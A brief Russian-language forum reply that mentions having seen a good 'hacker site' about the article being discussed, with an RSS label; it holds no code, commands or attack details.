Re: История одного красивого ...

О а я тут видел хороший сайт по этой статье Хакер сайт

RSS-материал